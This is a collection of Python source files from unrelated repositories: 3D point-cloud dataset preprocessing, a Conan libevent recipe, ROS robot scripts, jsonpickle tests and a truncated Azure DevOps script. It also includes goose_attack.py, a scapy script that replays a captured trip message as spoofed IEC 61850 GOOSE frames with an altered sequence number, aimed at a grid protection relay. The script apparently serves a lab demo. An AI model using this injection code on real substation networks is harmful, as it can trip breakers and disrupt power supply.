rec_list.append(rec[key][-1])
            except (KeyError, IndexError, TypeError):
ret_dict['%s Recall'%(clsname)] = 0
rec_list.append(0)
temp = []
for v in rec_list:
if np.isnan(v):
continue
temp.append(v)
ret_dict['AR'] = np.mean(temp)
return ret_dict
def reset(self):
self.gt_map_cls = {} # {scan_id: [(classname, bbox)]}
self.pred_map_cls = {} # {scan_id: [(classname, bbox, score)]}
self.scan_cnt = 0
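# Illustrative usage sketch (hypothetical dataset config DC and eval loop;
# not part of the original module):
#     calc = APCalculator(ap_iou_thresh=0.25, class2type_map=DC.class2type)
#     for end_points in eval_batches:
#         calc.step(parse_predictions(end_points, config_dict),
#                   parse_groundtruths(end_points, config_dict))
#     metrics = calc.compute_metrics()  # per-class AP/Recall plus 'mAP' and 'AR'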
|
zaiweizhang/votenet | s3dis/process_data.py | import numpy as np
import os
import sys
sys.path.append('../utils')
from pc_util import *
from multiprocessing import Pool
data_path = 'Path/to/Stanford3dDataset_v1.2_Aligned_Version'
out_path = 'Path/to/output_dir'
if not os.path.exists(out_path):
os.makedirs(out_path)
area_names = ['Area_1', 'Area_2', 'Area_3', 'Area_4', 'Area_5', 'Area_6']
sem_map = {'ceiling':0, 'floor':1, 'wall':2, 'column':3,'beam':4, 'window':5, 'door':6,
'table':7, 'chair':8, 'bookcase':9, 'sofa':10, 'board':11, 'clutter':12, 'stair':13}
def process_one_room(name_pair):
area_name, room_name = name_pair.split('-')
if os.path.exists(os.path.join(out_path, area_name+'_'+room_name+'_all_noangle.npy')):
print('exists')
return
if not os.path.exists(os.path.join(data_path, area_name, room_name, room_name+'.txt')):
return
room_pt = np.loadtxt(os.path.join(data_path, area_name, room_name, room_name+'.txt'))
#print(room_pt.shape)
inds = np.random.choice(room_pt.shape[0], 50000)
pt = room_pt[inds]
# write_ply(pt[:,0:3], 'hh.ply')
room_center = np.zeros((pt.shape[0], 3))
room_size = np.zeros((pt.shape[0], 3))
room_angle = np.zeros((pt.shape[0],1))
room_ins = np.zeros((pt.shape[0],1))
room_sem = np.zeros((pt.shape[0],1))
print('start', area_name, room_name)
for i, ins_name in enumerate(os.listdir(os.path.join(data_path, area_name, room_name, 'Annotations'))):
print('{}/{}'.format(i, len(os.listdir(os.path.join(data_path, area_name, room_name, 'Annotations')))), area_name, room_name, ins_name)
if not os.path.exists(os.path.join(data_path, area_name, room_name, 'Annotations', ins_name)):
print('not exists', ins_name)
continue
#print(ins_name)
sem_name = ins_name.split('_')[0]
sem_label = sem_map[sem_name]
ins_label = i
ins_pt = np.loadtxt(os.path.join(data_path, area_name, room_name, 'Annotations', ins_name))[:,0:3]
x_min, y_min, z_min = ins_pt.min(0)
x_max, y_max, z_max = ins_pt.max(0)
size = np.array([x_max-x_min, y_max-y_min, z_max-z_min])
center = np.array([x_max/2+x_min/2, y_max/2+y_min/2, z_max/2+z_min/2])
ins_inds = []
for j in range(ins_pt.shape[0]):
dis = np.sum(np.square(ins_pt[j]-pt[:,0:3]),axis=1)
min_dis = dis.min()
min_ind = np.argmin(dis)
if min_dis<1e-3:
ins_inds.append(min_ind)
room_center[ins_inds] = center
room_size[ins_inds] = size
room_ins[ins_inds] = ins_label+1
room_sem[ins_inds] = sem_label+1
print('prepare to save', area_name, room_name)
res = np.concatenate((room_center, room_size, room_angle, room_ins, room_sem), axis=1)
np.save(os.path.join(out_path, area_name+'_'+room_name+'_pt.npy'), pt)
np.save(os.path.join(out_path, area_name+'_'+room_name+'_all_noangle.npy'), res)
print('save', area_name, room_name)
'''
write_ply_color(pt[:,0:3], room_sem[:,0].astype(np.int32), 'test/'+area_name+'_'+room_name+'_sem.ply')
write_ply_color(pt[:,0:3], room_ins[:,0], 'test/'+area_name+'_'+room_name+'_ins.ply')
centers = np.unique(room_center, axis=0)
#centers = centers[np.sum(np.square(centers))>0]
new_pt = np.concatenate((pt[:,0:3], centers), axis=0)
colors = np.zeros(new_pt.shape[0])
colors[pt.shape[0]:]=1
write_ply_color(new_pt, colors, 'test/'+area_name+'_'+room_name+'_center.ply')
print('save')
'''
if __name__=="__main__":
name_pairs = []
for area_name in area_names:
for room_name in os.listdir(os.path.join(data_path, area_name)):
name_pairs.append(area_name+'-'+room_name)
#process_one_room(area_name+'-'+room_name)
p = Pool(12)
p.map(process_one_room, name_pairs)
|
zaiweizhang/votenet | mp3d/process_matterport.py | import numpy as np
import os
from plyfile import PlyData, PlyElement
import json
import sys
import csv
from matplotlib import cm
def read_mesh_vertices_rgb(filename):
""" read XYZ RGB for each vertex.
Note: RGB values are in 0-255
"""
assert os.path.isfile(filename)
with open(filename, 'rb') as f:
plydata = PlyData.read(f)
num_verts = plydata['vertex'].count
vertices = np.zeros(shape=[num_verts, 6], dtype=np.float32)
vertices[:,0] = plydata['vertex'].data['x']
vertices[:,1] = plydata['vertex'].data['y']
vertices[:,2] = plydata['vertex'].data['z']
vertices[:,3] = plydata['vertex'].data['red']
vertices[:,4] = plydata['vertex'].data['green']
vertices[:,5] = plydata['vertex'].data['blue']
return vertices
def write_mesh_vertices_rgb(filename, out_name, colors):
""" read XYZ RGB for each vertex.
Note: RGB values are in 0-255
"""
with open(filename, 'rb') as f:
plydata = PlyData.read(f)
num_verts = plydata['vertex'].count
plydata['vertex'].data['red'] = colors[:,0]
plydata['vertex'].data['green'] = colors[:,1]
plydata['vertex'].data['blue'] = colors[:,2]
plydata.write(out_name)
def read_aggregation(filename):
assert os.path.isfile(filename)
object_id_to_segs = {}
label_to_segs = {}
with open(filename) as f:
data = json.load(f)
num_objects = len(data['segGroups'])
for i in range(num_objects):
object_id = data['segGroups'][i]['objectId'] + 1 # instance ids should be 1-indexed
label = data['segGroups'][i]['label']
segs = data['segGroups'][i]['segments']
object_id_to_segs[object_id] = segs
if label in label_to_segs:
label_to_segs[label].extend(segs)
else:
label_to_segs[label] = segs
return object_id_to_segs, label_to_segs
def read_segmentation(filename):
assert os.path.isfile(filename)
seg_to_verts = {}
with open(filename) as f:
data = json.load(f)
num_verts = len(data['segIndices'])
for i in range(num_verts):
seg_id = data['segIndices'][i]
if seg_id in seg_to_verts:
seg_to_verts[seg_id].append(i)
else:
seg_to_verts[seg_id] = [i]
return seg_to_verts, num_verts
def represents_int(s):
''' if string s represents an int. '''
try:
int(s)
return True
except ValueError:
return False
def read_label_mapping(filename, label_from='raw_category', label_to='nyu40id'):
assert os.path.isfile(filename)
mapping = dict()
with open(filename) as csvfile:
reader = csv.DictReader(csvfile, delimiter='\t')
for row in reader:
if row[label_from]=='' or row[label_to]=='':
continue
mapping[row[label_from]] = int(row[label_to])
if represents_int(list(mapping.keys())[0]):
mapping = {int(k):v for k,v in mapping.items()}
return mapping
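# Illustrative sketch (hypothetical TSV contents; not part of the original script):
#     mapping = read_label_mapping('category_mapping.tsv',
#                                  label_from='raw_category', label_to='nyu40id')
#     mapping['chair']  # -> the integer nyu40 id listed for 'chair' in the TSV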
data_path = 'scans'
out_path = 'ours'
if not os.path.exists(out_path):
os.makedirs(out_path)
LABEL_MAP_FILE = '/home/bo/data/matterport3d/Matterport/metadata/category_mapping.tsv'
label_map = read_label_mapping(LABEL_MAP_FILE,
label_from='raw_category', label_to='nyu40id')
for house_name in os.listdir(data_path):
if len(house_name) != 11:
continue
for tmp_name in os.listdir(os.path.join(data_path, house_name, 'region_segmentations')):
if not tmp_name.endswith('.ply'):
continue
region_name = tmp_name[:-4]
print(house_name, region_name)
"""
output_file = '{}/{}_{}'.format(out_path, house_name, region_name)
if os.path.exists(output_file+'_vert.npy'):
continue
"""
mesh_vertices = read_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'))
fseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.fsegs.json')
vseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.vsegs.json')
semseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.semseg.json')
with open(semseg_filename) as f:
try:
data = json.load(f)
except:
print('bad json file', semseg_filename)
continue
with open(vseg_filename) as f:
try:
data = json.load(f)
except:
print('bad json file', vseg_filename)
continue
object_id_to_segs, label_to_segs = read_aggregation(semseg_filename)
seg_to_verts, num_verts = read_segmentation(vseg_filename)
label_ids = np.zeros(shape=(num_verts), dtype=np.uint32) # 0: unannotated
object_id_to_label_id = {}
flag = 0
for label, segs in label_to_segs.items():
if label not in label_map:
flag = 1
break
label_id = label_map[label]
for seg in segs:
if not seg in seg_to_verts.keys():
continue
verts = seg_to_verts[seg]
label_ids[verts] = label_id
if flag == 1:
print ("issues with", house_name, region_name)
continue
instance_ids = np.zeros(shape=(num_verts), dtype=np.uint32) # 0: unannotated
num_instances = len(np.unique(list(object_id_to_segs.keys())))
for object_id, segs in object_id_to_segs.items():
for seg in segs:
if not seg in seg_to_verts.keys():
continue
verts = seg_to_verts[seg]
instance_ids[verts] = object_id
if object_id not in object_id_to_label_id:
object_id_to_label_id[object_id] = label_ids[verts][0]
instance_bboxes = np.zeros((num_instances,7))
for obj_id in object_id_to_segs:
label_id = object_id_to_label_id[obj_id]
obj_pc = mesh_vertices[instance_ids==obj_id, 0:3]
if len(obj_pc) == 0: continue
xmin = np.min(obj_pc[:,0])
ymin = np.min(obj_pc[:,1])
zmin = np.min(obj_pc[:,2])
xmax = np.max(obj_pc[:,0])
ymax = np.max(obj_pc[:,1])
zmax = np.max(obj_pc[:,2])
bbox = np.array([(xmin+xmax)/2, (ymin+ymax)/2, (zmin+zmax)/2,
xmax-xmin, ymax-ymin, zmax-zmin, label_id])
# NOTE: this assumes obj_id is in 1,2,3,.,,,.NUM_INSTANCES
instance_bboxes[obj_id-1,:] = bbox
output_file = '{}/{}_{}'.format(out_path, house_name, region_name)
"""
c = label_ids.astype(np.float32)/label_ids.max()
cmap=cm.get_cmap('rainbow')
colors = cmap(c)[:,0:3]*255.0
write_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'),
output_file+'_sem.ply', colors)
c = instance_ids.astype(np.float32)/instance_ids.max()
cmap=cm.get_cmap('rainbow')
colors = cmap(c)[:,0:3]*255.0
write_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'),
output_file+'_ins.ply', colors)
"""
np.save(output_file+'_vert.npy', mesh_vertices)
np.save(output_file+'_sem_label.npy', label_ids)
np.save(output_file+'_ins_label.npy', instance_ids)
np.save(output_file+'_bbox.npy', instance_bboxes)
# with open(fseg_filename) as f:
# data = json.load(f)
# fseg_ids = data['segIndices']
# object_id_to_segs = {}
# label_to_segs = {}
# with open(semseg_filename) as f:
#     data = json.load(f)
# num_objects = len(data['segGroups'])
# for i in range(num_objects):
# object_id = data['segGroups'][i]['objectId'] + 1 # instance ids should be 1-indexed
# label = data['segGroups'][i]['label']
# segs = data['segGroups'][i]['segments']
# object_id_to_segs[object_id] = segs
# if label in label_to_segs:
# label_to_segs[label].extend(segs)
# else:
# label_to_segs[label] = segs
# os.system('unzip %s'%(os.path.join(data_path, house_name, 'region_segmentations.zip')))
|
netlabcode/demo-2021 | goose_attack.py | from scapy.all import *
import os
import binascii
# locate the pcap file relative to this script
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(THIS_FOLDER, '9bus_trip.pcap')
#MAC Address references
#source = {'siemens1': "b4:b1:5a:05:30:6d",'siemens2':"b4:b1:5a:05:30:61",'alstom':"80:b3:2a:0c:23:76"}
#dest={'siemens1': "01:0c:cd:01:00:01", 'siemens2':"01:0c:cd:01:00:00",'alstom':"01:0c:cd:01:00:20"}
source = {'UKgrid1': "80:b3:2a:0c:6d:7a",'UKgrid2': "80:b3:2a:0c:23:76",'RTDS':"00:50:c2:4f:9a:2b",'Siemens1': "b4:b1:5a:05:30:6d",'IEC1': "01:0c:cd:01:00:01", 'IEC2':"01:0c:cd:01:00:00",'Alstom':"01:0c:cd:01:00:20"}
dest= {'UKgrid1': "80:b3:2a:0c:6d:7a",'UKgrid2': "80:b3:2a:0c:23:76",'RTDS':"00:50:c2:4f:9a:2b",'Siemens1': "b4:b1:5a:05:30:6d",'IEC1': "01:0c:cd:01:00:01", 'IEC2':"01:0c:cd:01:00:00",'Alstom':"01:0c:cd:01:00:20"}
# read the pcap file and store the packets as pcap_data
pcap_data=rdpcap(my_file)
# get the total number of packets in the pcap file
packetq = len(pcap_data)
#print("number of packet:"+len(pcap_data))
print("Number of Packets: %s" % packetq)
print('===================================================')
# Set Sequence number
getload = list(bytes(pcap_data[0].payload))
getload[113]=1
getload[114]=195
bytesload = bytes(getload)
# loop to craft and send each packet
count = 0
while (count < 11):
#convert payload packet from bytes to hex
hexform=binascii.hexlify(bytesload)
print(count)
print(hexform)
print("--------")
    # craft a packet combining the target addresses with the payload
crafted=Ether(src=source['UKgrid2'],dst= dest['Alstom'])/bytesload
hexcrafted=binascii.hexlify(bytes(crafted))
print(count)
#set packet type
crafted.type=0x88b8
#send packet
sendp(crafted,inter=1./800,iface='Ethernet')
print("========")
#time.sleep(1)
count = count + 1
"""
x = 0
while (x < 20):
count = 19
#convert payload packet from bytes to hex
hexform=binascii.hexlify(bytes(pcap_data[count].payload))
print(count)
print(hexform)
print("--------")
#Create packet combination address target and payload
crafted=Ether(src=source['UKgrid2'],dst= dest['Alstom'])/pcap_data[count].payload
hexcrafted=binascii.hexlify(bytes(crafted))
print(hexcrafted)
#set packet type
crafted.type=0x88b8
#send packet
sendp(crafted,inter=1./800,iface='Ethernet')
x = x + 1
print("========")
""" |
Zinnion/conan-libevent | build.py | <reponame>Zinnion/conan-libevent
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bincrafters import build_template_default
import platform
if __name__ == "__main__":
builder = build_template_default.get_builder(pure_c=True)
if platform.system() == "Windows":
for settings, options, env_vars, build_requires, reference in reversed(builder.items):
builder.add(settings, {"libevent:with_openssl": False}, env_vars, build_requires)
builder.run()
|
Zinnion/conan-libevent | conanfile.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
from conans import ConanFile, AutoToolsBuildEnvironment, RunEnvironment, tools
from conans.errors import ConanInvalidConfiguration
class LibeventConan(ConanFile):
name = "libevent"
version = "2.1.9"
description = "libevent - an event notification library"
topics = ("conan", "libevent", "event")
url = "https://github.com/zinnion/conan-libevent"
homepage = "https://github.com/libevent/libevent"
author = "Zinnion <<EMAIL>>"
license = "BSD-3-Clause"
exports = ["LICENSE.md"]
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False],
"fPIC": [True, False],
"with_openssl": [True, False],
"disable_threads": [True, False]}
default_options = {"shared": False,
"fPIC": True,
"with_openssl": True,
"disable_threads": False}
_source_subfolder = "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
del self.settings.compiler.libcxx
if self.settings.os == "Windows" and \
self.options.shared:
raise ConanInvalidConfiguration("libevent does not support shared on Windows")
if self.options.with_openssl and self.options.shared:
# static OpenSSL cannot be properly detected because libevent picks up system ssl first
# so enforce shared openssl
os.environ['OPENSSL_ROOT_DIR'] = self.deps_cpp_info["OpenSSL"].rootpath
self.output.warn("Enforce shared OpenSSL for shared build")
self.options["OpenSSL"].shared = self.options.shared
#def requirements(self):
#if self.options.with_openssl:
# self.requires.add("OpenSSL/1.1.1b@zinnion/stable")
def source(self):
checksum = "eeb4c6eb2c4021e22d6278cdcd02815470243ed81077be0cbd0f233fa6fc07e8"
tools.get("{0}/releases/download/release-{1}-beta/libevent-{1}-beta.tar.gz".format(self.homepage, self.version), sha256=checksum)
extracted_folder = "libevent-{0}-beta".format(self.version)
os.rename(extracted_folder, self._source_subfolder)
def imports(self):
# Copy shared libraries for dependencies to fix DYLD_LIBRARY_PATH problems
#
# Configure script creates conftest that cannot execute without shared openssl binaries.
# Ways to solve the problem:
# 1. set *LD_LIBRARY_PATH (works with Linux with RunEnvironment
# but does not work on OS X 10.11 with SIP)
# 2. copying dylib's to the build directory (fortunately works on OS X)
if self.settings.os == "Macos":
self.copy("*.dylib*", dst=self._source_subfolder, keep_path=False)
def build(self):
if self.settings.os == "Linux" or self.settings.os == "Macos":
autotools = AutoToolsBuildEnvironment(self)
env_vars = autotools.vars.copy()
# required to correctly find static libssl on Linux
if self.options.with_openssl and self.settings.os == "Linux":
env_vars['OPENSSL_LIBADD'] = '-ldl'
# disable rpath build
tools.replace_in_file(os.path.join(self._source_subfolder, "configure"), r"-install_name \$rpath/", "-install_name ")
# compose configure options
configure_args = []
if not self.options.shared:
configure_args.append("--disable-shared")
configure_args.append("--enable-openssl" if self.options.with_openssl else "--disable-openssl")
if self.options.disable_threads:
configure_args.append("--disable-thread-support")
with tools.environment_append(env_vars):
with tools.chdir(self._source_subfolder):
# set LD_LIBRARY_PATH
with tools.environment_append(RunEnvironment(self).vars):
autotools.configure(args=configure_args)
autotools.make()
elif self.settings.os == "Windows":
vcvars = tools.vcvars_command(self.settings)
suffix = ''
if self.options.with_openssl:
suffix = "OPENSSL_DIR=" + self.deps_cpp_info['OpenSSL'].rootpath
# add runtime directives to runtime-unaware nmakefile
tools.replace_in_file(os.path.join(self._source_subfolder, "Makefile.nmake"),
'LIBFLAGS=/nologo',
'LIBFLAGS=/nologo\n'
'CFLAGS=$(CFLAGS) /%s' % str(self.settings.compiler.runtime))
# do not build tests. static_libs is the only target, no shared libs at all
make_command = "nmake %s -f Makefile.nmake static_libs" % suffix
with tools.chdir(self._source_subfolder):
self.run("%s && %s" % (vcvars, make_command))
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses", ignore_case=True, keep_path=False)
self.copy("*.h", dst="include", src=os.path.join(self._source_subfolder, "include"))
if self.settings.os == "Windows":
self.copy("event-config.h", src=os.path.join(self._source_subfolder, "WIN32-Code", "nmake", "event2"), dst="include/event2")
self.copy("tree.h", src=os.path.join(self._source_subfolder, "WIN32-Code"), dst="include")
self.copy(pattern="*.lib", dst="lib", keep_path=False)
for header in ['evdns', 'event', 'evhttp', 'evrpc', 'evutil']:
self.copy(header+'.h', dst="include", src=self._source_subfolder)
if self.options.shared:
if self.settings.os == "Macos":
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
else:
self.copy(pattern="*.so*", dst="lib", keep_path=False)
else:
self.copy(pattern="*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
if self.settings.os == "Linux":
self.cpp_info.libs.extend(["rt"])
if self.settings.os == "Windows":
self.cpp_info.libs.append('ws2_32')
if self.options.with_openssl:
self.cpp_info.defines.append('EVENT__HAVE_OPENSSL=1')
|
zhl017/omiyage | Documents/cancel_goal.py | <filename>Documents/cancel_goal.py<gh_stars>0
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from actionlib_msgs.msg import GoalID
class cancel_goal():
def __init__(self):
self.is_cancel = False
self.goal = GoalID()
self.sub_yolo = rospy.Subscriber('/yolov5', String, self.cbyolo, queue_size = 1)
self.pub_cancel_goal = rospy.Publisher('/move_base/cancel', GoalID, queue_size = 1)
rospy.loginfo('Waiting for yolo data.....')
loop_rate = rospy.Rate(15)
while not rospy.is_shutdown():
if self.is_cancel:
self.cancel()
loop_rate.sleep()
def cbyolo(self, msg):
# rospy.loginfo(rospy.get_caller_id() + ' %s', msg.data)
self.is_cancel = True
def cancel(self):
rospy.loginfo("Cancel Goal.....")
self.pub_cancel_goal.publish(GoalID())
self.is_cancel = False
if __name__ == '__main__':
rospy.init_node('cancel_goal')
node = cancel_goal()
|
zhl017/omiyage | Documents/turtlebot3_manipulator_demo.py | #!/usr/bin/env python3
import sys
import rospy
import moveit_commander
class manipulator():
def __init__(self):
moveit_commander.roscpp_initialize(sys.argv)
self.group = moveit_commander.MoveGroupCommander("arm")
self.group1 = moveit_commander.MoveGroupCommander("gripper")
rate = rospy.Rate(10)
while not rospy.is_shutdown():
self.process()
rate.sleep()
def control_gripper(self, onoff):
joint = self.group1.get_current_joint_values()
# rospy.loginfo(joint)
if onoff:
joint[0] = 0.01 # open
else:
joint[0] = 0 # close
self.group1.go(joint, wait=True)
self.group1.stop()
def control_arm(self, j1, j2, j3, j4):
joint = self.group.get_current_joint_values()
# rospy.loginfo(joint)
# rad
joint[0] = j1
joint[1] = j2
joint[2] = j3
joint[3] = j4
self.group.go(joint, wait=True)
self.group.stop()
def process(self):
# pose 1
self.control_arm(0.0, -1.0, 0.3, 0.7)
# pose 2
self.control_arm(0.0, 0.6, 0.1, -0.7)
# tool close
self.control_gripper(False)
# pose 1
self.control_arm(0.0, -1.0, 0.3, 0.7)
# pose 3 (pose 2 with the base joint rotated)
self.control_arm(0.7, 0.6, 0.1, -0.7)
# tool open
self.control_gripper(True)
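# Usage sketch (assumptions, not from the repo): this demo expects a running
# MoveIt move_group providing the "arm" and "gripper" planning groups, e.g.
# from the TurtleBot3 manipulation stack, before the node is started:
#   roslaunch turtlebot3_manipulation_moveit_config move_group.launch
#   rosrun <your_package> turtlebot3_manipulator_demo.py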
if __name__ == '__main__':
rospy.init_node('turtlebot3_manipulator_demo')
node = manipulator()
|
misantroop/jsonpickle | tests/stdlib_test.py | <reponame>misantroop/jsonpickle
# -*- coding: utf-8 -*-
"""Test miscellaneous objects from the standard library"""
import uuid
import unittest
import jsonpickle
class UUIDTestCase(unittest.TestCase):
def test_random_uuid(self):
u = uuid.uuid4()
encoded = jsonpickle.encode(u)
decoded = jsonpickle.decode(encoded)
expect = u.hex
actual = decoded.hex
self.assertEqual(expect, actual)
def test_known_uuid(self):
expect = '28b56adbd18f44e2a5556bba2f23e6f6'
exemplar = uuid.UUID(expect)
encoded = jsonpickle.encode(exemplar)
decoded = jsonpickle.decode(encoded)
actual = decoded.hex
self.assertEqual(expect, actual)
class BytesTestCase(unittest.TestCase):
def test_bytestream(self):
expect = (b'\x89HDF\r\n\x1a\n\x00\x00\x00\x00\x00\x08\x08\x00'
b'\x04\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xffh'
b'\x848\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff'
b'\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00'
b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x88\x00\x00\x00\x00\x00\x00\x00\xa8\x02\x00'
b'\x00\x00\x00\x00\x00\x01\x00\x01\x00')
encoded = jsonpickle.encode(expect)
actual = jsonpickle.decode(encoded)
self.assertEqual(expect, actual)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(UUIDTestCase))
suite.addTest(unittest.makeSuite(BytesTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
misantroop/jsonpickle | tests/helper.py | import unittest
class SkippableTest(unittest.TestCase):
def skip(self, msg):
if hasattr(self, 'skipTest'):
return self.skipTest(msg)
return None
|
misantroop/jsonpickle | tests/datetime_test.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import unittest
import datetime
import time
import jsonpickle
from jsonpickle import tags
class ObjWithDate(object):
def __init__(self):
ts = datetime.datetime.now()
self.data = dict(a='a', ts=ts)
self.data_ref = dict(b='b', ts=ts)
# UTC implementation from Python 2.7 docs
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta()
def tzname(self, dt):
return 'UTC'
def dst(self, dt):
return datetime.timedelta()
utc = UTC()
class TimestampedVariable(object):
def __init__(self, value=None):
self._value = value
self._dt_read = datetime.datetime.utcnow()
self._dt_write = self._dt_read
def get(self, default_value=None):
if self._dt_read is None and self._dt_write is None:
value = default_value
self._value = value
self._dt_write = datetime.datetime.utcnow()
else:
value = self._value
self._dt_read = datetime.datetime.utcnow()
return value
def set(self, new_value):
self._dt_write = datetime.datetime.utcnow()
self._value = new_value
def __repr__(self):
dt_now = datetime.datetime.utcnow()
td_read = dt_now - self._dt_read
td_write = dt_now - self._dt_write
s = '<TimestampedVariable>\n'
s += ' value: ' + str(self._value) + '\n'
s += ' dt_read: ' + str(self._dt_read) + ' (%s ago)' % td_read + '\n'
s += ' dt_write: ' + str(self._dt_write) + ' (%s ago)' % td_write + '\n'
return s
def erasable(self, td=datetime.timedelta(seconds=1)):
dt_now = datetime.datetime.utcnow()
td_read = dt_now - self._dt_read
td_write = dt_now - self._dt_write
return td_read > td and td_write > td
class PersistentVariables(object):
def __init__(self):
self._data = {}
def __getitem__(self, key):
return self._data.setdefault(key, TimestampedVariable(None))
def __setitem__(self, key, value):
return self._data.setdefault(key, TimestampedVariable(value))
def __repr__(self):
return str(self._data)
class DateTimeInnerReferenceTestCase(unittest.TestCase):
def test_object_with_inner_datetime_refs(self):
pvars = PersistentVariables()
pvars['z'] = 1
pvars['z2'] = 2
pickled = jsonpickle.encode(pvars)
obj = jsonpickle.decode(pickled)
# ensure the references are valid
self.assertTrue(obj['z']._dt_read is obj['z']._dt_write)
self.assertTrue(obj['z2']._dt_read is obj['z2']._dt_write)
# ensure the values are valid
self.assertEqual(obj['z'].get(), 1)
self.assertEqual(obj['z2'].get(), 2)
# ensure get() updates _dt_read
self.assertTrue(obj['z']._dt_read is not obj['z']._dt_write)
self.assertTrue(obj['z2']._dt_read is not obj['z2']._dt_write)
class DateTimeSimpleTestCase(unittest.TestCase):
def _roundtrip(self, obj):
"""
pickle and then unpickle object, then assert the new object is the
same as the original.
"""
pickled = jsonpickle.encode(obj)
unpickled = jsonpickle.decode(pickled)
self.assertEqual(obj, unpickled)
def test_datetime(self):
"""
jsonpickle should pickle a datetime object
"""
self._roundtrip(datetime.datetime.now())
def test_date(self):
"""
jsonpickle should pickle a date object
"""
self._roundtrip(datetime.datetime.today())
def test_time(self):
"""
jsonpickle should pickle a time object
"""
self._roundtrip(datetime.datetime.now().time())
def test_timedelta(self):
"""
jsonpickle should pickle a timedelta object
"""
self._roundtrip(datetime.timedelta(days=3))
def test_utc(self):
"""
jsonpickle should be able to encode and decode a datetime with a
simple, pickleable UTC tzinfo.
"""
self._roundtrip(datetime.datetime.utcnow().replace(tzinfo=utc))
def test_unpickleable(self):
"""
If 'unpicklable' is False on the Pickler, the date objects should be
simple, human-readable strings.
"""
obj = datetime.datetime.now()
pickler = jsonpickle.pickler.Pickler(unpicklable=False)
flattened = pickler.flatten(obj)
self.assertEqual(str(obj), flattened)
def test_object_with_datetime(self):
test_obj = ObjWithDate()
json = jsonpickle.encode(test_obj)
test_obj_decoded = jsonpickle.decode(json)
self.assertEqual(test_obj_decoded.data['ts'],
test_obj_decoded.data_ref['ts'])
class DateTimeAdvancedTestCase(unittest.TestCase):
def setUp(self):
self.pickler = jsonpickle.pickler.Pickler()
self.unpickler = jsonpickle.unpickler.Unpickler()
def tearDown(self):
self.pickler.reset()
self.unpickler.reset()
def test_struct_time(self):
expect = time.struct_time([1, 2, 3, 4, 5, 6, 7, 8, 9])
json = jsonpickle.encode(expect)
actual = jsonpickle.decode(json)
self.assertEqual(type(actual), time.struct_time)
self.assertEqual(expect, actual)
def test_struct_time_chars(self):
expect = time.struct_time('123456789')
flattened = self.pickler.flatten(expect)
actual = self.unpickler.restore(flattened)
self.assertEqual(expect, actual)
def test_datetime_structure(self):
obj = datetime.datetime.now()
flattened = self.pickler.flatten(obj)
self.assertTrue(tags.OBJECT in flattened)
self.assertTrue('__reduce__' in flattened)
inflated = self.unpickler.restore(flattened)
self.assertEqual(obj, inflated)
def test_datetime_inside_int_keys_defaults(self):
t = datetime.time(hour=10)
s = jsonpickle.encode({1: t, 2: t})
d = jsonpickle.decode(s)
self.assertEqual(d["1"], d["2"])
self.assertTrue(d["1"] is d["2"])
self.assertTrue(isinstance(d["1"], datetime.time))
def test_datetime_inside_int_keys_with_keys_enabled(self):
t = datetime.time(hour=10)
s = jsonpickle.encode({1: t, 2: t}, keys=True)
d = jsonpickle.decode(s, keys=True)
self.assertEqual(d[1], d[2])
self.assertTrue(d[1] is d[2])
self.assertTrue(isinstance(d[1], datetime.time))
def test_datetime_repr_not_unpicklable(self):
obj = datetime.datetime.now()
pickler = jsonpickle.pickler.Pickler(unpicklable=False)
flattened = pickler.flatten(obj)
self.assertFalse(tags.REPR in flattened)
self.assertFalse(tags.OBJECT in flattened)
self.assertEqual(str(obj), flattened)
def test_datetime_dict_keys_defaults(self):
"""Test that we handle datetime objects as keys."""
datetime_dict = {datetime.datetime(2008, 12, 31): True}
pickled = jsonpickle.encode(datetime_dict)
expect = {'datetime.datetime(2008, 12, 31, 0, 0)': True}
actual = jsonpickle.decode(pickled)
self.assertEqual(expect, actual)
def test_datetime_dict_keys_with_keys_enabled(self):
"""Test that we handle datetime objects as keys."""
datetime_dict = {datetime.datetime(2008, 12, 31): True}
pickled = jsonpickle.encode(datetime_dict, keys=True)
expect = datetime_dict
actual = jsonpickle.decode(pickled, keys=True)
self.assertEqual(expect, actual)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DateTimeSimpleTestCase))
suite.addTest(unittest.makeSuite(DateTimeAdvancedTestCase))
suite.addTest(unittest.makeSuite(DateTimeInnerReferenceTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
kagarlickij/azuredevops-security-automation | onprem/create_group.py | <reponame>kagarlickij/azuredevops-security-automation
"""
This script creates a group in the project via the TFSSecurity cmd
"""
import subprocess
import argparse
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupDescription", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
